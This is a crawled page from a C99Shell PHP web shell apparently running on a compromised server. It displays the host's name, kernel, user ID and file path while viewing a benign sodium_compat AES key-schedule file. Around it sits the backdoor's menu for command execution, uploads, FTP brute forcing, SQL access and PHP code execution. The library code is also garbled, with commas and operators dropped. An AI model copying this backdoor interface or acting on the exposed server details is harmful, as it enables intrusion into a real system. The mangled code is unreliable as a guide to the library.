!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paragonie/sodium_compat/src/Core/AES/   drwxr-xr-x
Free 26.27 GB of 117.98 GB (22.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     KeySchedule.php (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (class_exists('ParagonIE_Sodium_Core_AES_KeySchedule'false)) {
    return;
}

/**
 * @internal This should only be used by sodium_compat
 */
class ParagonIE_Sodium_Core_AES_KeySchedule
{
    
/** @var array<int, int> $skey -- has size 120 */
    
protected $skey;

    
/** @var bool $expanded */
    
protected $expanded false;

    
/** @var int $numRounds */
    
private $numRounds;

    
/**
     * @param array $skey
     * @param int $numRounds
     */
    
public function __construct(array $skey$numRounds 10)
    {
        
$this->skey $skey;
        
$this->numRounds $numRounds;
    }

    
/**
     * Get a value at an arbitrary index. Mostly used for unit testing.
     *
     * @param int $i
     * @return int
     */
    
public function get($i)
    {
        return 
$this->skey[$i];
    }

    
/**
     * @return int
     */
    
public function getNumRounds()
    {
        return 
$this->numRounds;
    }

    
/**
     * @param int $offset
     * @return ParagonIE_Sodium_Core_AES_Block
     */
    
public function getRoundKey($offset)
    {
        return 
ParagonIE_Sodium_Core_AES_Block::fromArray(
            
array_slice($this->skey$offset8)
        );
    }

    
/**
     * Return an expanded key schedule
     *
     * @return ParagonIE_Sodium_Core_AES_Expanded
     */
    
public function expand()
    {
        
$exp = new ParagonIE_Sodium_Core_AES_Expanded(
            
array_fill(01200),
            
$this->numRounds
        
);
        
$n = ($exp->numRounds 1) << 2;
        for (
$u 0$v 0$u $n; ++$u$v += 2) {
            
$x $y $this->skey[$u];
            
$x &= 0x55555555;
            
$exp->skey[$v] = ($x | ($x << 1)) & ParagonIE_Sodium_Core_Util::U32_MAX;
            
$y &= 0xAAAAAAAA;
            
$exp->skey[$v 1] = ($y | ($y >> 1)) & ParagonIE_Sodium_Core_Util::U32_MAX;
        }
        return 
$exp;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--